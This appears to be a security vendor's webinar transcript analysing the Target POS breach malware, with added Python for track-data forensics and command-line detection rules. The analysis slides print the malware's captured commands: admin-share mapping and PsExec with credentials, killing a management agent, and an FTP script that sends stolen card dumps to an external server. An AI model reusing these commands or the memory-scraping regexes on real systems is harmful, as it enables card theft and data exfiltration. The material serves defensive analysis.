Published on February 4, 2014
The Target Data Breach: Anatomy of an Attack
February 4, 2014
Stephen Coty, Director, Threat Research
Diane Garey, Product Marketing
> www.alertlogic.com
Today's Agenda
• What's in the News
• About POS Malware
• How the Malware Works
• How to Protect Yourself
Logistics
• Ask a question anytime using the "Question Box"
• Look for slides on the Alert Logic SlideShare account
• You'll get an email with a link to today's recording
• Live Tweet today's event: #AlertLogic_ACID
30 Days of the Target Breach (timeline slide: Dec 18th, Jan 10th, Jan 15th, Jan 17th)
You Never Want to Send This Communication
What's Being Reported About the Attack
• Malicious software infected POS systems and sent credit card data out via FTP
• Possibly a home-grown POS system running a Windows OS
• Malware traced to Russia and sold to 60 European cyber criminals
About the Impact
• 110 million customers affected
• Data being sold on the underground market
• Eight other retailers have been compromised
• Arrests being made of people using the cards
Malware for Sale
• Went into testing Feb 12, 2013 under the title "Dump CC memory grabber (pos-trojan)"
• The underground community laughed at the outrageous price
• Currently not being sold because the seller (Ree) sold out his buyers
Economy Version ($1800)
• Exfiltration by sending over the FTP protocol
• Log is not encrypted
• First updated edition free
• Rebuild of the product $200 (max 3)
• No support
Budget Version ($2000)
• Exfiltration by sending over the FTP protocol
• Log encrypted with a cipher of the seller's own invention
• Free updates for 3 months
• Rebuild $100 (max 5)
• Support included
Full Version ($2300)
• Exfiltration "through the gate" (via a gateway rather than direct FTP)
• Log encrypted with the seller's own cipher
• Free updates for life
• Further rebuilds $100 each
More Malware Sales Details
• License agreement (translated from Russian): "You use the program at your own risk and the creators assume no responsibility for your further use of this software. When buying, you automatically accept the rules. Transferring the program and reselling it to third parties is prohibited and is punished by deprivation of the license and of everything that is included in your version."
• Seller Information
  – E-mail 1: firstname.lastname@example.org
  – E-mail 2: email@example.com
  – ICQ: 565033
  – Skype: s.r.a.ree4
Stolen Credit Cards are Selling for $15-60
• Initial dumps: ~$12 average
• Recent dumps: ~$15-60 range
How the Malware (Kaptoxa-Rescator) Works
• Infects the POS system: dum.exe executes mmon.exe
• Disables the firewall and creates an autorun entry so it launches at boot
• Scrapes memory: reads track 1 and track 2 credit card data out of process memory
• Saves the data to a default .dll file
• Establishes a share: net.exe/net1.exe creates a Windows share
• Stores and forwards the data: to an internal server as a .txt file, which then sends it to an external FTP server controlled by the attackers
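The memory-scraping step is what makes this family dangerous: magnetic-stripe track data sits in the POS process's memory in the fixed ISO/IEC 7813 layout before it is encrypted for the processor, delimited by sentinel characters that are trivial to search for. The following Python is an added example, not code from the slides, from Alert Logic or from the malware itself, showing how a forensic scan of a memory dump (or any captured file) can locate track 1 and track 2 records the same way a scraper does, validate the PAN with the Luhn check so that random digit runs are not reported, and mask the PAN in its output. The sample buffer, the cardholder name and the test card numbers in it are constructed for the example.

```python
import re

# Track 1 (format B) and track 2 layouts per ISO/IEC 7813. The sentinels
# (% ^ ? for track 1, ; = ? for track 2) frame the fields, which is exactly
# why a scraper can find them in raw process memory.
TRACK1_RE = re.compile(rb"%B(\d{13,19})\^([A-Z /.\-]{2,26})\^(\d{4})(\d{3})([0-9A-Z ]*)\?")
TRACK2_RE = re.compile(rb";(\d{13,19})=(\d{4})(\d{3})(\d*)\?")


def luhn_ok(pan: str) -> bool:
    """Standard Luhn check: rejects digit runs that merely look like a PAN."""
    total = 0
    for i, ch in enumerate(reversed(pan)):
        d = int(ch)
        if i % 2 == 1:  # double every second digit from the right
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total % 10 == 0


def mask_pan(pan: str) -> str:
    """Keep only the first six and last four digits (PCI DSS display masking)."""
    return pan[:6] + "*" * (len(pan) - 10) + pan[-4:]


def find_track_data(buf: bytes) -> list:
    """Scan a byte buffer (e.g. a process memory dump) for Luhn-valid track records.

    Returns one dict per hit with the track number, byte offset, masked PAN and
    the fields that are safe to log; the raw PAN never leaves this function.
    """
    hits = []
    for m in TRACK1_RE.finditer(buf):
        pan = m.group(1).decode()
        if luhn_ok(pan):
            hits.append({"track": 1, "offset": m.start(), "pan": mask_pan(pan),
                         "name": m.group(2).decode().strip(),
                         "expiry": m.group(3).decode()})
    for m in TRACK2_RE.finditer(buf):
        pan = m.group(1).decode()
        if luhn_ok(pan):
            hits.append({"track": 2, "offset": m.start(), "pan": mask_pan(pan),
                         "expiry": m.group(2).decode()})
    return sorted(hits, key=lambda h: h["offset"])


# Constructed sample "memory": filler bytes around one track 1 record, one
# track 2 record, and a decoy track 2 record whose PAN fails the Luhn check.
# The PANs are the well-known test numbers 4111111111111111 and
# 5500000000000004, not real cards; the cardholder is fictional.
SAMPLE_MEMORY = (
    b"\x00\x00SALE 0417 \x90\x90"
    b"%B4111111111111111^DOE/JOHN^25121010000000000000?"
    b"\x00\x00receipt printed\x00"
    b";5500000000000004=25121010000000000000?"
    b"\xff\xff;4111111111111112=2512101?\x00"
)

if __name__ == "__main__":
    for hit in find_track_data(SAMPLE_MEMORY):
        print(hit)
```

Run against a real dump, the scan is a quick way to answer the question a breach like this raises first: was unencrypted track data resident in memory on this terminal at all, and for which process.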
Normal POS Activity: Pre-Infection
Post-Infection Activity: Step 1: New Service
Post-Infection Activity: Step 1.1: Looks like a regular user; starts POSWDS
Post-Infection Activity: Step 1.2
net.exe establishes a Windows share. Filtering for commands issued and captured in malware analysis:
cmd.exe /c move C:\WINDOWS\system32\net.EXE
net start POSWDS
C:\WINDOWS\system32\cmd.exe /c net use S: \\10.116.240.31\c$\WINDOWS\twain_32a.dll /user:ttcopscli3acs\Best1_user BackupU$
Post-Infection Activity: Step 2
BackDoor-FBPL takes the following actions:
Step 1: C:\WINDOWS\system32\cmd.exe /c psexec /accepteula \\10.116.240.31 -u ttcopscli3acs\Best1_user -p BackupU$r cmd /c "taskkill /IM bladelogic.exe /F"
Step 2: c:\windows\system32\cmd.exe /c psexec /accepteula \\10.116.240.3 -u ttcopscli3acs\Best1_user -p BackupU$r cmd -d bladelogic
BackDoor-FBPL then sleeps until the predetermined times of 10:00am and 5:00pm and runs:
Step 1: C:\WINDOWS\system32\cmd.exe /c move \\10.116.240.31\NT\twain_32a.dll C:\data_2014_1_20_17_53.txt (the file name is built from the system date and time)
BMC Whitepaper
Post-Infection Activity: Step 2 continued
Step 2: Write the FTP commands to a text file (cmd.txt); the two lines after open are the user name and password:
open 220.127.116.11
digitalw
Crysis1089
cd etc
cd bin
send C:\data_2014_1_20_17_53.txt
quit
Step 3: Command line that feeds the script to the FTP client:
c:\windows\system32\cmd.exe /c ftp -s:c:\program files\xxxxxxxxxx\temp\cmd.txt > c:\xxxxxxxxxx\temp\cmd.txt
Theory: How the Malware was Delivered: Ariba Vendor Portal
Theory: How the Malware was Delivered: Login to Portal
Theory: How the Malware was Injected: NCR POS Terminals
Evolution of Target POS Malware (timeline slide, 2008 to 2013)
• Memory Dumper (2008): copies a specific process in memory
• AlinaPOS: v1 created; v2 adds encryption; v2.1 adds logging; v3.2 & 5.2 add exfiltration
• DexterPOS: steals the process list from an infected machine while parsing memory dumps
• VSkimmer: detects card readers, grabs information, sends data to a control server
• BlackPOS / Kaptoxa / Rescator (2013)
Kaptoxa & Others Originated from Dexter
• Dexter:
  – Able to read process memory from infected machines
  – Parses memory dumps looking for track 1 & 2 of the credit card data
• Infected POS systems in 40 countries
  – 42% of the infected systems were in North America
  – 19% in the UK
• Targeted Windows OS
How to Mitigate Risk
• Scan POS systems with your choice of antivirus
• Check for the removal of the autorun key: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run with the value "svchit"
• Check for the removal of three executables: %USERPROFILE%\svchst.exe, Dum.exe, Mmon.exe
• Disable outbound FTP from the POS systems at the network level, not only on the host itself
• Create a whitelist of acceptable external addresses using IP filtering rules or Access Control Lists (ACLs)
(Contact us for a copy of our Malware Analysis Report)
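The indicators in the analysis slides (the admin-share mapping and PsExec commands under Step 1.2 and Step 2, the timestamped dump file, the FTP client driven by a script file) all appear in process command lines, so the checks on this slide can run continuously from process-creation logs instead of once by hand. The Python below is an added example, not Alert Logic's code or the analysis report's, that applies rules generalised from those commands (any admin share, any PsExec target) to a handful of constructed Sysmon/4688-style events, flags hosts where several rules fire together, and checks a list of constructed outbound flows against an egress allowlist so that FTP to an unknown address, the exfiltration path described above, is caught at the network. Host names, event records, flows and allowlisted networks are all made up for the example.

```python
import ipaddress
import re
from collections import defaultdict

# Constructed Windows process-creation records (the fields a Sysmon event 1 or
# Security 4688 event gives you), reduced to what the rules need. They are
# modelled on the commands shown in the malware-analysis slides; they are not
# real Target logs. The last two are benign noise the rules must ignore.
SAMPLE_EVENTS = [
    {"host": "POS-0417", "cmdline": r"net use S: \\10.116.240.31\c$\WINDOWS\twain_32a.dll /user:ttcopscli3acs\Best1_user BackupU$r"},
    {"host": "POS-0417", "cmdline": r'cmd.exe /c psexec /accepteula \\10.116.240.31 -u ttcopscli3acs\Best1_user -p BackupU$r cmd /c "taskkill /IM bladelogic.exe /F"'},
    {"host": "POS-0417", "cmdline": r"cmd.exe /c move \\10.116.240.31\NT\twain_32a.dll C:\data_2014_1_20_17_53.txt"},
    {"host": "POS-0417", "cmdline": r"net start POSWDS"},
    {"host": "STAGING-01", "cmdline": r"cmd.exe /c ftp -s:c:\program files\xxxxxxxxxx\temp\cmd.txt"},
    {"host": "POS-0417", "cmdline": r"net use P: \\printsrv01\receipts"},
    {"host": "POS-0418", "cmdline": r"cmd.exe /c dir C:\pos\logs"},
]

# (rule name, regex over the command line). Each generalises one slide command:
# any admin share mapped to a .dll path, PsExec with credentials on the line,
# the BladeLogic agent being killed, the POSWDS service, the date-stamped dump
# file name, and ftp.exe reading its commands from a script file.
RULES = [
    ("admin_share_mapped_to_dll", re.compile(r"net\s+use\s+\S+\s+\\\\[\w.]+\\c\$\\.*\.dll", re.I)),
    ("psexec_with_embedded_creds", re.compile(r"psexec\b.*\s-u\s+\S+\s+-p\s+\S+", re.I)),
    ("bladelogic_agent_killed", re.compile(r"taskkill\s+/IM\s+bladelogic\.exe", re.I)),
    ("poswds_service_started", re.compile(r"net\s+start\s+POSWDS\b", re.I)),
    ("timestamped_dump_file", re.compile(r"\\data_\d{4}(_\d{1,2}){4}\.txt\b", re.I)),
    ("ftp_driven_by_script_file", re.compile(r"\bftp(\.exe)?\s+-s:", re.I)),
]


def detect(events, rules=RULES):
    """Return one alert per (event, rule) that fired, in event order."""
    alerts = []
    for ev in events:
        for name, rx in rules:
            if rx.search(ev["cmdline"]):
                alerts.append({"host": ev["host"], "rule": name, "cmdline": ev["cmdline"]})
    return alerts


def suspect_hosts(alerts, min_rules=2):
    """Hosts on which at least min_rules distinct rules fired: the ones to image first."""
    seen = defaultdict(set)
    for a in alerts:
        seen[a["host"]].add(a["rule"])
    return sorted(h for h, rules in seen.items() if len(rules) >= min_rules)


# Egress policy for the POS segment: only these destination networks are allowed
# outbound, and FTP is never allowed. Constructed values; the real list would be
# the internal ranges plus the payment processor's published addresses.
POS_EGRESS_ALLOWLIST = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "198.51.100.0/24")]

# Constructed flow records: (source host, destination IP, destination port).
SAMPLE_CONNECTIONS = [
    ("POS-0417", "10.116.240.31", 445),   # internal SMB to the staging host
    ("POS-0417", "198.51.100.9", 443),    # approved processor over HTTPS
    ("STAGING-01", "203.0.113.45", 21),   # FTP to an unknown external address
]


def egress_violations(connections, allowlist=POS_EGRESS_ALLOWLIST):
    """Flag any flow to a destination outside the allowlist, and any FTP at all."""
    bad = []
    for src, dst, port in connections:
        addr = ipaddress.ip_address(dst)
        allowed = any(addr in net for net in allowlist)
        if port == 21:
            bad.append((src, dst, port, "ftp"))
        elif not allowed:
            bad.append((src, dst, port, "not-allowlisted"))
    return bad


if __name__ == "__main__":
    found = detect(SAMPLE_EVENTS)
    for a in found:
        print(f"{a['host']}: {a['rule']}: {a['cmdline']}")
    print("suspect hosts:", suspect_hosts(found))
    print("egress violations:", egress_violations(SAMPLE_CONNECTIONS))
```

The rules are deliberately written around behaviour (mapping an admin share to a DLL path, PsExec with a password on the command line, FTP fed from a script) rather than the one IP address and account name from the analysis, because those are the first things the next operator changes. The egress check is the network-side counterpart of the slide's "disable FTP at the network, not the host" point: a compromised host cannot be trusted to enforce its own firewall.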
Credits to the Sources of Data
• http://www.alertlogic.com/data-breach-at-target-exposes-40-million-credit-cards/
• http://www.seculert.com/blog/2012/12/dexter-draining-blood-out-of-point-of-sales.html
• http://krebsonsecurity.com/2014/01/a-first-look-at-the-target-intrusion-malware/
• http://www.cyphort.com/blog/cyphort-tracks-down-new-variants-of-target-malware/
• http://www.tripwire.com/state-of-security/vulnerability-management/targets-point-sale-system-compromised/
Join Tomorrow's Webinar: Delivering Real Protection: Alert Logic Security-as-a-Service
• http://alrt.co/ThreatLogDemo
• Fully managed intrusion detection and log management
• Deploy anywhere your datacenter is located
Thank you!
To follow our research: #AlertLogic_ACID, http://www.alertlogic.com/resources/blog/
For a copy of the "Malware Analysis Report": firstname.lastname@example.org